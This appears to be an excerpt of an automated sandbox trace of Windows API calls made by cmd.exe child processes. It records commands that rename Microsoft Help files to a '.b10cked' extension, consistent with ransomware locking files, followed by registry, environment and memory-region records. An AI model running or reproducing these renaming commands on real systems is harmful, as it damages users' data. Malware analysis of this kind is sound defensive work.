hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ed9c, lpData=0x24eda0, lpcbData=0x24ed98*=0x1000 | out: lpType=0x24ed9c*=0x4, lpData=0x24eda0*=0x9, lpcbData=0x24ed98*=0x4) returned 0x0 [0196.076] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ed9c, lpData=0x24eda0, lpcbData=0x24ed98*=0x1000 | out: lpType=0x24ed9c*=0x4, lpData=0x24eda0*=0x9, lpcbData=0x24ed98*=0x4) returned 0x0 [0196.076] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ed9c, lpData=0x24eda0, lpcbData=0x24ed98*=0x1000 | out: lpType=0x24ed9c*=0x0, lpData=0x24eda0*=0x9, lpcbData=0x24ed98*=0x1000) returned 0x2 [0196.076] RegCloseKey (hKey=0x40) returned 0x0 [0196.076] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639e [0196.076] srand (_Seed=0x5b88639e) [0196.076] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_NamedURL.HxW.b10cked\"" [0196.076] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_NamedURL.HxW.b10cked\"" [0196.076] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.077] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2f18f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0196.077] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0196.077] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0196.077] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0196.077] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0196.077] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0196.077] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0196.077] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0196.077] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0196.077] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0196.077] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0196.077] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0196.077] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0196.077] GetEnvironmentStringsW () returned 0x2f22e0* [0196.077] FreeEnvironmentStringsW (penv=0x2f22e0) returned 1 [0196.077] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.077] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0196.077] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0196.077] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0196.077] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0196.077] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0196.077] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0196.078] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0196.078] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0196.078] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0196.078] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24fb60 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.078] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24fb60, lpFilePart=0x24fb5c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24fb5c*="Desktop") returned 0x18 [0196.078] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0196.078] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f8dc | out: lpFindFileData=0x24f8dc) returned 0x2f0020 [0196.078] FindClose (in: hFindFile=0x2f0020 | out: hFindFile=0x2f0020) returned 1 [0196.078] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f8dc | out: lpFindFileData=0x24f8dc) returned 0x2f0020 [0196.078] FindClose (in: hFindFile=0x2f0020 | out: hFindFile=0x2f0020) returned 1 [0196.078] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f8dc | out: lpFindFileData=0x24f8dc) returned 0x2f0020 [0196.078] FindClose (in: hFindFile=0x2f0020 | out: hFindFile=0x2f0020) returned 1 [0196.078] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0196.078] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0196.079] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0196.079] GetEnvironmentStringsW () returned 0x2f2b00* [0196.079] FreeEnvironmentStringsW (penv=0x2f2b00) returned 1 [0196.079] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.079] GetConsoleOutputCP () returned 0x1b5 [0196.079] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0196.079] GetUserDefaultLCID () returned 0x409 [0196.080] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0196.080] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24fca0, cchData=128 | out: lpLCData="0") returned 2 [0196.080] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24fca0, cchData=128 | out: lpLCData="0") returned 2 [0196.080] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24fca0, cchData=128 | out: lpLCData="1") returned 2 [0196.080] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0196.080] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0196.080] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0196.080] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0196.080] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0196.080] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0196.080] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0196.080] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0196.080] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0196.080] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0196.080] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0196.081] GetConsoleTitleW (in: lpConsoleTitle=0x2e08e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.081] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0196.081] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0196.081] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0196.081] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0196.082] _wcsicmp (_String1="move", _String2=")") returned 68 [0196.082] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0196.082] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0196.082] _wcsicmp (_String1="IF", _String2="move") returned -4 [0196.082] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0196.082] _wcsicmp (_String1="REM", _String2="move") returned 5 [0196.082] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0196.085] GetConsoleTitleW (in: lpConsoleTitle=0x24f998, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.085] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0196.085] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0196.085] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0196.085] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0196.085] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0196.085] _wcsicmp (_String1="move", _String2="CD") returned 10 [0196.085] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0196.085] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0196.085] _wcsicmp (_String1="move", _String2="REN") returned -5 [0196.085] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0196.085] _wcsicmp (_String1="move", _String2="SET") returned -6 [0196.086] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0196.086] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0196.086] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0196.086] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0196.086] _wcsicmp (_String1="move", _String2="MD") returned 11 [0196.086] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0196.086] _wcsicmp (_String1="move", _String2="RD") returned -5 [0196.086] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0196.086] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0196.086] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0196.086] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0196.086] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0196.086] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0196.086] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0196.086] _wcsicmp (_String1="move", _String2="VER") returned -9 [0196.086] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0196.086] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0196.086] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0196.086] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0196.086] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0196.086] _wcsicmp (_String1="move", _String2="START") returned -6 [0196.086] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0196.086] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0196.086] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0196.088] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.088] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.088] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24f754, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x24f74c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24f74c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0196.088] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0196.089] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0196.089] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0196.089] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0196.089] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0196.089] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0196.089] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0196.089] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0196.089] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0196.089] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0196.089] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0196.089] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0196.089] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0196.089] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0196.089] _wcsicmp (_String1="HX_103~2.HXW", _String2=".") returned 58 [0196.089] _wcsicmp (_String1="HX_103~2.HXW", _String2="..") returned 58 [0196.089] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW" (normalized: "c:\\users\\alluse~1\\micros~2\\hx_103~2.hxw")) returned 0x2022 [0196.089] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2f1e58 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.089] SetErrorMode (uMode=0x0) returned 0x0 [0196.089] SetErrorMode (uMode=0x1) returned 0x0 [0196.090] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW", nBufferLength=0x104, lpBuffer=0x24f0dc, lpFilePart=0x24f0c4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW", lpFilePart=0x24f0c4*="HX_103~2.HXW") returned 0x27 [0196.090] SetErrorMode (uMode=0x0) returned 0x1 [0196.090] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0196.090] _wcsicmp (_String1="HX_103~2.HXW", _String2=".") returned 58 [0196.090] _wcsicmp (_String1="HX_103~2.HXW", _String2="..") returned 58 [0196.090] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW" (normalized: "c:\\users\\alluse~1\\micros~2\\hx_103~2.hxw")) returned 0x2022 [0196.090] SetErrorMode (uMode=0x0) returned 0x0 [0196.090] SetErrorMode (uMode=0x1) returned 0x0 [0196.090] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW", nBufferLength=0x104, lpBuffer=0x24f558, lpFilePart=0x24f2f0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW", lpFilePart=0x24f2f0*="HX_103~2.HXW") returned 0x27 [0196.090] SetErrorMode (uMode=0x0) returned 0x1 [0196.090] SetErrorMode (uMode=0x0) returned 0x0 [0196.090] SetErrorMode (uMode=0x1) returned 0x0 [0196.090] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_NamedURL.HxW.b10cked", nBufferLength=0x104, lpBuffer=0x24f760, lpFilePart=0x24f2f0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_NamedURL.HxW.b10cked", lpFilePart=0x24f2f0*="Hx_1033_MKWD_NamedURL.HxW.b10cked") returned 0x3c [0196.090] SetErrorMode (uMode=0x0) returned 0x1 [0196.090] SetLastError (dwErrCode=0x0) [0196.090] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_NamedURL.HxW.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\hx_1033_mkwd_namedurl.hxw.b10cked")) returned 0xffffffff [0196.090] GetLastError () returned 0x2 [0196.090] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW", fInfoLevelId=0x1, lpFindFileData=0x24ec6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec6c) returned 0x2e0e90 [0196.091] FindNextFileW (in: hFindFile=0x2e0e90, lpFindFileData=0x24ec6c | out: lpFindFileData=0x24ec6c) returned 0 [0196.091] FindClose (in: hFindFile=0x2e0e90 | out: hFindFile=0x2e0e90) returned 1 [0196.091] GetLastError () returned 0x12 [0196.091] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW", fInfoLevelId=0x1, lpFindFileData=0x24ec6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec6c) returned 0x2e0e90 [0196.092] FindNextFileW (in: hFindFile=0x2e0e90, lpFindFileData=0x24ec6c | out: lpFindFileData=0x24ec6c) returned 0 [0196.092] FindClose (in: hFindFile=0x2e0e90 | out: hFindFile=0x2e0e90) returned 1 [0196.092] GetLastError () returned 0x12 [0196.093] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW", fInfoLevelId=0x1, lpFindFileData=0x2f1bf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2f1bf8) returned 0x2e0e90 [0196.093] FindNextFileW (in: hFindFile=0x2e0e90, lpFindFileData=0x2f1bf8 | out: lpFindFileData=0x2f1bf8) returned 0 [0196.093] FindClose (in: hFindFile=0x2e0e90 | out: hFindFile=0x2e0e90) returned 1 [0196.093] GetLastError () returned 0x12 [0196.093] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW", fInfoLevelId=0x1, lpFindFileData=0x2f1bf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2f1bf8) returned 0x2e0e90 [0196.093] FindNextFileW (in: hFindFile=0x2e0e90, lpFindFileData=0x2f1bf8 | out: lpFindFileData=0x2f1bf8) returned 0 [0196.093] FindClose (in: hFindFile=0x2e0e90 | out: hFindFile=0x2e0e90) returned 1 [0196.093] GetLastError () returned 0x12 [0196.093] _get_osfhandle (_FileHandle=2) returned 0xb [0196.093] GetFileType (hFile=0xb) returned 0x2 [0196.220] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0196.220] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24ee3c | out: lpMode=0x24ee3c) returned 1 [0196.220] _get_osfhandle (_FileHandle=2) returned 0xb [0196.220] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x24ee70 | out: lpConsoleScreenBufferInfo=0x24ee70) returned 1 [0196.221] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0196.222] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x24eeb0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0196.222] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x24ee94, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x24ee94*=0x2c) returned 1 [0196.222] longjmp () [0196.223] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.223] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0196.223] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.223] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0196.223] _get_osfhandle (_FileHandle=0) returned 0x3 [0196.223] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0196.223] SetConsoleInputExeNameW () returned 0x1 [0196.223] GetConsoleOutputCP () returned 0x1b5 [0196.223] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0196.223] SetThreadUILanguage (LangId=0x0) returned 0x409 [0196.223] exit (_Code=1) Process: id = "453" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16a20" os_pid = "0xa70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MTOC_Hx.HxH.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28928 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28929 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28930 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28931 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 28932 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28933 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28934 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28935 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28936 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 28937 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29007 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29008 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29009 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29010 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 29011 start_va = 0x500000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 29012 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29013 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29014 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29015 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29016 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29017 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29018 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29019 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29020 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = 